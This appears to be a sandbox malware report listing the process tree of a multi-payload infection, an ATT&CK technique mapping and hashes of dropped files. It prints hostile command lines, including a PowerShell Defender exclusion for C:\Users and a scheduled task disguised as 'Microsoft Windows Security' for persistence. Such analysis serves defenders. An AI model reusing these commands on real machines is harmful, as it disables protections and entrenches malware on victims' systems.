- - C:\Users\Admin\AppData\Local\Temp\Files\DIFF.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\DIFF.exe"
    3⤵
    PID:6952
- - C:\Users\Admin\AppData\Local\Temp\Files\pi.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"
    3⤵
    PID:16656
- - C:\Users\Admin\AppData\Local\Temp\Files\logon.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\logon.exe"
    3⤵
    PID:14312
- - C:\Users\Admin\AppData\Local\Temp\Files\downloader.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\downloader.exe"
    3⤵
    PID:12272
- - C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe"
    3⤵
    PID:16032
- - C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe"
    3⤵
    PID:14244
  - - C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.new.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.new.exe" /update "C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe"
      4⤵
      PID:16100
    - - C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.exe" /delete "C:\Users\Admin\AppData\Local\Temp\Files\[UPG]CSS.new.exe"
        5⤵
        
        PID:17220
- - C:\Users\Admin\AppData\Local\Temp\Files\dns1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\dns1.exe"
    3⤵
    PID:21700
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:23396
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      PID:22176
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1936 -parentBuildID 20240401114208 -prefsHandle 1852 -prefMapHandle 1848 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9c346c8-76da-47bb-8791-d84710dd8c99} 22176 "\\.\pipe\gecko-crash-server-pipe.22176" gpu
        5⤵
        
        PID:16096
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2348 -parentBuildID 20240401114208 -prefsHandle 2340 -prefMapHandle 2336 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77e4d351-4ab8-4e96-a26e-2698e03710f9} 22176 "\\.\pipe\gecko-crash-server-pipe.22176" socket
        5⤵
        
        PID:18572
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3296 -childID 1 -isForBrowser -prefsHandle 3284 -prefMapHandle 3280 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d10d613-7fdd-4e32-b0c6-7dda26afc67d} 22176 "\\.\pipe\gecko-crash-server-pipe.22176" tab
        5⤵
        
        PID:14544
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3096 -childID 2 -isForBrowser -prefsHandle 3192 -prefMapHandle 3032 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5fb00bb-70a0-44b5-a290-e5b40cdb87cf} 22176 "\\.\pipe\gecko-crash-server-pipe.22176" tab
        5⤵
        
        PID:10424
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4212 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4304 -prefMapHandle 4300 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c4d5520-d1be-4713-af18-b4fd2c05553e} 22176 "\\.\pipe\gecko-crash-server-pipe.22176" utility
        5⤵
        
        PID:20600
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 3796 -prefMapHandle 5276 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {085b77ab-675f-41f9-96e1-533fc0b2d6e3} 22176 "\\.\pipe\gecko-crash-server-pipe.22176" tab
        5⤵
        
        PID:22080
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 4 -isForBrowser -prefsHandle 5460 -prefMapHandle 5468 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53895ed7-f80c-4c53-910b-5b6e45eb6792} 22176 "\\.\pipe\gecko-crash-server-pipe.22176" tab
        5⤵
        
        PID:20188
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5724 -childID 5 -isForBrowser -prefsHandle 5644 -prefMapHandle 5648 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a23c27a-9766-41d0-9254-c72390ea2243} 22176 "\\.\pipe\gecko-crash-server-pipe.22176" tab
        5⤵
        
        PID:22812
- - C:\Users\Admin\AppData\Local\Temp\Files\Survox.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Survox.exe"
    3⤵
    PID:11212
- - C:\Users\Admin\AppData\Local\Temp\Files\fastad4.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\fastad4.exe"
    3⤵
    PID:17268
- - C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
    3⤵
    PID:20312
- - C:\Users\Admin\AppData\Local\Temp\Files\random.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
    3⤵
    PID:25968
- - C:\Users\Admin\AppData\Local\Temp\Files\exclude.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\exclude.exe"
    3⤵
    PID:7648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath C:\Users"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:24444
- - C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe"
    3⤵
    PID:21052
- - C:\Users\Admin\AppData\Local\Temp\Files\SVC.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\SVC.exe"
    3⤵
    PID:24204
- - C:\Users\Admin\AppData\Local\Temp\Files\NorthSperm.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NorthSperm.exe"
    3⤵
    PID:10924
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k move Surrey Surrey.cmd && Surrey.cmd && exit
      4⤵
      PID:5732
- - C:\Users\Admin\AppData\Local\Temp\Files\exe007.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\exe007.exe"
    3⤵
    PID:19604
  - - C:\Windows\SysWOW64\Glkded32.exe
      C:\Windows\system32\Glkded32.exe
      4⤵
      PID:5328
    - - C:\Windows\SysWOW64\Heeedi32.exe
        
        C:\Windows\system32\Heeedi32.exe
        5⤵
        
        PID:17024
      - C:\Windows\SysWOW64\Helkdhog.exe
        
        C:\Windows\system32\Helkdhog.exe
        6⤵
        
        PID:6408
        
        C:\Windows\SysWOW64\Ioepnneg.exe
        
        C:\Windows\system32\Ioepnneg.exe
        7⤵
        
        PID:19144
        
        C:\Windows\SysWOW64\Ifnddkdg.exe
        
        C:\Windows\system32\Ifnddkdg.exe
        8⤵
        
        PID:23644
        
        C:\Windows\SysWOW64\Ioiiim32.exe
        
        C:\Windows\system32\Ioiiim32.exe
        9⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\Ipkbhp32.exe
        
        C:\Windows\system32\Ipkbhp32.exe
        10⤵
        
        PID:7516
        
        C:\Windows\SysWOW64\Imobad32.exe
        
        C:\Windows\system32\Imobad32.exe
        11⤵
        
        PID:13180
        
        C:\Windows\SysWOW64\Jgomkifd.exe
        
        C:\Windows\system32\Jgomkifd.exe
        12⤵
        
        PID:3372
        
        C:\Windows\SysWOW64\Kplkonhp.exe
        
        C:\Windows\system32\Kplkonhp.exe
        13⤵
        
        PID:19744
        
        C:\Windows\SysWOW64\Klbldo32.exe
        
        C:\Windows\system32\Klbldo32.exe
        14⤵
        
        PID:20136
        
        C:\Windows\SysWOW64\Lnnhjp32.exe
        
        C:\Windows\system32\Lnnhjp32.exe
        15⤵
        
        PID:23752
        
        C:\Windows\SysWOW64\Mqqnakfg.exe
        
        C:\Windows\system32\Mqqnakfg.exe
        16⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\Mgblnc32.exe
        
        C:\Windows\system32\Mgblnc32.exe
        17⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\Njbepo32.exe
        
        C:\Windows\system32\Njbepo32.exe
        18⤵
        
        PID:8096
        
        C:\Windows\SysWOW64\Nnqnfm32.exe
        
        C:\Windows\system32\Nnqnfm32.exe
        19⤵
        
        PID:10956
        
        C:\Windows\SysWOW64\Njgnknph.exe
        
        C:\Windows\system32\Njgnknph.exe
        20⤵
        
        PID:16888
        
        C:\Windows\SysWOW64\Ojndlmjp.exe
        
        C:\Windows\system32\Ojndlmjp.exe
        21⤵
        
        PID:7992
        
        C:\Windows\SysWOW64\Ofjolnlo.exe
        
        C:\Windows\system32\Ofjolnlo.exe
        22⤵
        
        PID:6652
        
        C:\Windows\SysWOW64\Pfqdml32.exe
        
        C:\Windows\system32\Pfqdml32.exe
        23⤵
        
        PID:25260
        
        C:\Windows\SysWOW64\Pamojd32.exe
        
        C:\Windows\system32\Pamojd32.exe
        24⤵
        
        PID:13132
        
        C:\Windows\SysWOW64\Qoclihll.exe
        
        C:\Windows\system32\Qoclihll.exe
        25⤵
        
        PID:8824
        
        C:\Windows\SysWOW64\Apnkgo32.exe
        
        C:\Windows\system32\Apnkgo32.exe
        26⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\Babala32.exe
        
        C:\Windows\system32\Babala32.exe
        27⤵
        
        PID:8076
        
        C:\Windows\SysWOW64\Ckdikelc.exe
        
        C:\Windows\system32\Ckdikelc.exe
        28⤵
        
        PID:8456
        
        C:\Windows\SysWOW64\Dnlhnpbl.exe
        
        C:\Windows\system32\Dnlhnpbl.exe
        29⤵
        
        PID:9296
        
        C:\Windows\SysWOW64\Dopncb32.exe
        
        C:\Windows\system32\Dopncb32.exe
        30⤵
        
        PID:7248
- - C:\Users\Admin\AppData\Local\Temp\Files\clcs.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\clcs.exe"
    3⤵
    PID:14780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:892
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:2652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4432
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:892
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\netbtugc.exe
    "C:\Windows\SysWOW64\netbtugc.exe"
    3⤵
    PID:24092
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:6552
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:27352
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:15748
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:21996
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:12472
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:27388
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:27412
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:27424
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:20760

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004EC 0x00000000000004E4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4088 -ip 4088
1⤵
PID:2088

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2788

C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4820

C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5800

C:\ProgramData\tweltf\hwbpwd.exe
C:\ProgramData\tweltf\hwbpwd.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5820
- C:\ProgramData\tweltf\hwbpwd.exe
  "C:\ProgramData\tweltf\hwbpwd.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1072

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
- Network Service Discovery
PID:4528

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
PID:5020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
PID:5540

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5344

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2720

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Executes dropped EXE
PID:2844

C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
1⤵
PID:4460

C:\ProgramData\tweltf\hwbpwd.exe
C:\ProgramData\tweltf\hwbpwd.exe
1⤵
PID:5332
- C:\ProgramData\tweltf\hwbpwd.exe
  "C:\ProgramData\tweltf\hwbpwd.exe"
  2⤵
  PID:6496
- C:\ProgramData\tweltf\hwbpwd.exe
  "C:\ProgramData\tweltf\hwbpwd.exe"
  2⤵
  PID:6504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 792 -ip 792
1⤵
PID:2784

C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
1⤵
PID:7592

C:\ProgramData\tweltf\hwbpwd.exe
C:\ProgramData\tweltf\hwbpwd.exe
1⤵
PID:7552
- C:\ProgramData\tweltf\hwbpwd.exe
  "C:\ProgramData\tweltf\hwbpwd.exe"
  2⤵
  PID:10440

C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
1⤵
PID:1912

C:\ProgramData\tweltf\hwbpwd.exe
C:\ProgramData\tweltf\hwbpwd.exe
1⤵
PID:12380
- C:\ProgramData\tweltf\hwbpwd.exe
  "C:\ProgramData\tweltf\hwbpwd.exe"
  2⤵
  PID:15816
- C:\ProgramData\tweltf\hwbpwd.exe
  "C:\ProgramData\tweltf\hwbpwd.exe"
  2⤵
  PID:15908

C:\ProgramData\tweltf\hwbpwd.exe
C:\ProgramData\tweltf\hwbpwd.exe
1⤵
PID:18516
- C:\ProgramData\tweltf\hwbpwd.exe
  "C:\ProgramData\tweltf\hwbpwd.exe"
  2⤵
  PID:21356

C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
1⤵
PID:18752

C:\ProgramData\tweltf\hwbpwd.exe
C:\ProgramData\tweltf\hwbpwd.exe
1⤵
PID:26496
- C:\ProgramData\tweltf\hwbpwd.exe
  "C:\ProgramData\tweltf\hwbpwd.exe"
  2⤵
  PID:12056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 8372 -ip 8372
1⤵
PID:13880

C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
1⤵
PID:23220

C:\ProgramData\hkpw\lgjeuo.exe
C:\ProgramData\hkpw\lgjeuo.exe
1⤵
PID:19960
- C:\ProgramData\hkpw\lgjeuo.exe
  "C:\ProgramData\hkpw\lgjeuo.exe"
  2⤵
  PID:9676

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:20212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 17640 -ip 17640
1⤵
PID:23132

C:\ProgramData\wblwqh\rgbvttl.exe
C:\ProgramData\wblwqh\rgbvttl.exe
1⤵
PID:8100

C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
1⤵
PID:3532

C:\Users\Admin\AppData\Roaming\service.exe
C:\Users\Admin\AppData\Roaming\service.exe
1⤵
PID:18760

C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
1⤵
PID:19048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Time Discovery

T1124

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Filesize
158KB

MD5
bfb045ceef93ef6ab1cef922a95a630e

SHA1
4a89fc0aa79757f4986b83f15b8780285db86fb6

SHA256
1f6b69d11a3066e21c40002a25986c44e24a66f023a40e5f49eecaea33f5576d

SHA512
9c1bfa88b5b5533ede94158fa3169b9e0458f1ceae04dae0e74f4c23a899ce27d9109bd298a2053fb698e2ed403f51a9b828ee9fa9d66b54a18cd0d969edc194

Download Submit
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

Filesize
710KB

MD5
4ed27cd391e16b0e256c76afc1f986c3

SHA1
e0d705f87f5b5334a81d18126b18a9a39f8b6d5e

SHA256
2096a5e42c046c360c7cd646309a0e7dbbaaed00e84e242166108464b7b0ca22

SHA512
7e9208d6782fa8ed08c4b896f314a535a5e38d18c4b66a2813698007d0efeea8014ef4c0bf4c139457c826d05eae4fd241c2db419a761b709f4f118bf0f9d1b6

Download Submit
C:\ProgramData\CFCBAAEB

Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\ProgramData\HCAFIJDGHCBFHJKFCGIEBGIIJD

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\ProgramData\HJDGHIJD

Filesize
114KB

MD5
1b06419c247c7c50294b3604a11e996f

SHA1
019d30b1697cced727e93c7bc22b218007134b02

SHA256
a9d816469eb8403f299bacc38b9f18edf0e8814b5b3f1ad765537fa6df486a3b

SHA512
1b950e034c09c8dd8dc52bd6abd6aaf97f08c4a285345a65c19f0676dc219afa0232f5b5ce7a19eedd2315f779f738dc7e946e6a9bfce975de57f6e707647745

Download Submit
C:\ProgramData\JKKEBGCGHIDHCBFHIDGH

Filesize
10KB

MD5
eb84b79f8aa33cd3b4ea28bcbf291e19

SHA1
0fab424884c38e15e06471f5a2059af8467ffbe0

SHA256
e89360474003880c9861221c9705ff8653167a2f77f28eb6d9716911de864844

SHA512
19228066f43b8ef7e53a82d5c03318195ecd66b4e0a567df7fd829dd1d620f88db7f028f69143cab2dd94fc45733dff59cc1a1758673c2b8450ea163b4f755ae

Download Submit
C:\ProgramData\freebl3.dll

Filesize
669KB

MD5
550686c0ee48c386dfcb40199bd076ac

SHA1
ee5134da4d3efcb466081fb6197be5e12a5b22ab

SHA256
edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa

SHA512
0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\msvcp140.dll

Filesize
439KB

MD5
5ff1fca37c466d6723ec67be93b51442

SHA1
34cc4e158092083b13d67d6d2bc9e57b798a303b

SHA256
5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062

SHA512
4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\ProgramData\service.exe

Filesize
44KB

MD5
4281b5461ba14bd8d120b72d4c7e12aa

SHA1
ce0dc0fa3daead9d9cf8d97699144118af68c91c

SHA256
4d1c2ad91414be21420eea26ab49e3583e9d7ded659f969d3a23909c8ce17810

SHA512
a7dc39d25f6c2fb6ea09e2037b5cb95d6141698d5f7051ccb84d1742c20e43520e795f718fa1d1196007e764a05d893d57f8ac6f23df0a18da40cc7b738291a2

Download Submit
C:\ProgramData\softokn3.dll

Filesize
251KB

MD5
4e52d739c324db8225bd9ab2695f262f

SHA1
71c3da43dc5a0d2a1941e874a6d015a071783889

SHA256
74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a

SHA512
2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

Download Submit
C:\ProgramData\vcruntime140.dll

Filesize
78KB

MD5
a37ee36b536409056a86f50e67777dd7

SHA1
1cafa159292aa736fc595fc04e16325b27cd6750

SHA256
8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825

SHA512
3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

Download Submit
C:\ProgramData\windows.exe

Filesize
95KB

MD5
93d6bdf913cab64fec58c765afdba3d4

SHA1
ea2aa579723c407e944edca127e0850e349c8011

SHA256
